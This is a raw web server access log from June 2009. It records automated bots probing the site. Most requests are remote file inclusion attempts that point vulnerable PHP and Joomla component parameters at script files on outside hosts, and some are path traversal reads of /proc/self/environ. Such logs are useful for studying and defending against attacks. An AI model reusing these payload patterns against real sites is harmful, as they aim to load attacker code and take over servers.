83.98.209.71 - - [20/Jun/2009:02:19:47 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:02:19:48 -0400] "GET /logs/?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
78.159.121.30 - - [20/Jun/2009:02:20:04 -0400] "GET /logs/access_log.Q109061000//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:02:20:04 -0400] "GET //errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:02:20:04 -0400] "GET /logs//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:02:20:08 -0400] "GET /logs/access_log.Q109051000//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.826"
83.98.209.71 - - [20/Jun/2009:02:21:08 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:21:09 -0400] "GET /phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:21:09 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:21:09 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:21:09 -0400] "GET /phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:21:10 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:21:10 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.149.163.198 - - [20/Jun/2009:02:21:11 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
62.149.163.198 - - [20/Jun/2009:02:21:11 -0400] "GET //class/class.dashboard_cms.php?where_framework=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
62.149.163.198 - - [20/Jun/2009:02:21:11 -0400] "GET /logs/access_log.Q109051600//class/class.dashboard_cms.php?where_framework=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
62.149.163.198 - - [20/Jun/2009:02:21:11 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.149.163.198 - - [20/Jun/2009:02:21:11 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.149.163.198 - - [20/Jun/2009:02:21:11 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.149.163.198 - - [20/Jun/2009:02:21:12 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
62.149.163.198 - - [20/Jun/2009:02:21:12 -0400] "GET /logs/access_log.Q109051600//class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
62.149.163.198 - - [20/Jun/2009:02:21:12 -0400] "GET //class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
62.149.163.198 - - [20/Jun/2009:02:21:12 -0400] "GET /logs//class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
62.149.163.198 - - [20/Jun/2009:02:21:12 -0400] "GET /logs/access_log.Q109051600//class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
62.149.163.198 - - [20/Jun/2009:02:21:12 -0400] "GET //class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
78.105.4.228 - - [20/Jun/2009:02:21:17 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://dmpacking.com/bbs/data/main/mawar.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.124.194.104 - - [20/Jun/2009:02:22:10 -0400] "GET /logs/access_log.Q109061000//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:02:22:10 -0400] "GET //errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:02:22:10 -0400] "GET /logs//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:02:22:13 -0400] "GET /logs/access_log.Q109051000//errors.php?error=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
83.222.193.94 - - [20/Jun/2009:02:24:00 -0400] "GET //errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:24:00 -0400] "GET /logs/access_log.Q109061000%20%20//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:24:00 -0400] "GET /logs//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:24:04 -0400] "GET //errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:24:04 -0400] "GET /logs//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:24:04 -0400] "GET /logs/access_log.Q109061000%20%20//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.222.193.94 - - [20/Jun/2009:02:24:45 -0400] "GET /logs/access_log.Q109051000%20%20//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:24:48 -0400] "GET /logs/access_log.Q109051000%20%20//errors.php?error=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:24:58 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [20/Jun/2009:02:24:59 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:02:24:59 -0400] "GET //errors.php?error=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:02:25:00 -0400] "GET /logs/access_log.Q109061000%20%20//errors.php?error=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:02:25:00 -0400] "GET /logs//errors.php?error=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:02:25:16 -0400] "GET /logs/access_log.Q109051000%20%20//errors.php?error=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:26:26 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:26:26 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:26:26 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:02:26:33 -0400] "GET /logs/access_log.Q109060600//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 286 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:26:33 -0400] "GET //administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:26:33 -0400] "GET /logs//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 264 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.94.155.59 - - [20/Jun/2009:02:26:37 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:19 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:19 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:19 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:20 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:20 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:20 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:21 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:22 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:22 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:22 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:22 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:27:22 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:27:31 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:02:27:33 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:02:27:33 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:02:27:33 -0400] "GET /logs/access_log.Q109060800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
124.217.216.86 - - [20/Jun/2009:02:27:37 -0400] "GET /logs/error_log.Q108052600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:27:37 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 252 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:27:37 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
121.165.73.157 - - [20/Jun/2009:02:27:46 -0400] "GET /logs/access_log.Q109060800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
222.122.160.145 - - [20/Jun/2009:02:27:47 -0400] "GET /logs/error_log.Q108072200/convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
203.94.155.59 - - [20/Jun/2009:02:28:02 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:28:07 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:28:07 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:28:09 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:02:28:10 -0400] "GET /logs/access_log.Q109060600//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:02:28:10 -0400] "GET /logs//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:02:28:10 -0400] "GET //administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.246.20.221 - - [20/Jun/2009:02:28:10 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [20/Jun/2009:02:28:12 -0400] "GET /logs/access_log.Q109060100//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:02:28:15 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
124.217.216.86 - - [20/Jun/2009:02:28:23 -0400] "GET /logs/access_log.Q109051200//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 286 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
121.165.73.157 - - [20/Jun/2009:02:28:30 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:02:28:30 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
124.217.216.86 - - [20/Jun/2009:02:28:33 -0400] "GET /logs/error_log.Q108052600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:28:33 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:28:33 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 252 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
68.109.233.157 - - [20/Jun/2009:02:28:43 -0400] "GET /logs/access_log.Q109050800//e404.php?INCLUDE_FOLDER=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
68.109.233.157 - - [20/Jun/2009:02:28:43 -0400] "GET //e404.php?INCLUDE_FOLDER=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
68.109.233.157 - - [20/Jun/2009:02:28:43 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
200.101.192.223 - - [20/Jun/2009:02:29:05 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:02:29:05 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:02:29:05 -0400] "GET /logs/error_log.Q108052600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.76"
68.109.233.157 - - [20/Jun/2009:02:29:08 -0400] "GET /logs/access_log.Q109051300//e404.php?INCLUDE_FOLDER=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
203.94.155.59 - - [20/Jun/2009:02:29:09 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:29:09 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:02:29:18 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.59.12.99 - - [20/Jun/2009:02:29:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.94.155.59 - - [20/Jun/2009:02:29:31 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:29:46 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:29:50 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:29:51 -0400] "GET /logs/access_log.Q109053000//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
124.217.216.86 - - [20/Jun/2009:02:30:06 -0400] "GET /logs/access_log.Q109060800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
121.165.73.157 - - [20/Jun/2009:02:30:09 -0400] "GET /logs/access_log.Q109051200//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
124.217.216.86 - - [20/Jun/2009:02:30:15 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.94.155.59 - - [20/Jun/2009:02:30:16 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:30:25 -0400] "GET //e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:30:25 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:30:25 -0400] "GET /logs/access_log.Q109060600%20%20//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:30:35 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:30:37 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:30:41 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:02:30:46 -0400] "GET /logs/access_log.Q109060800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:02:30:54 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.94.155.59 - - [20/Jun/2009:02:31:42 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:02:33:21 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:02:33:21 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
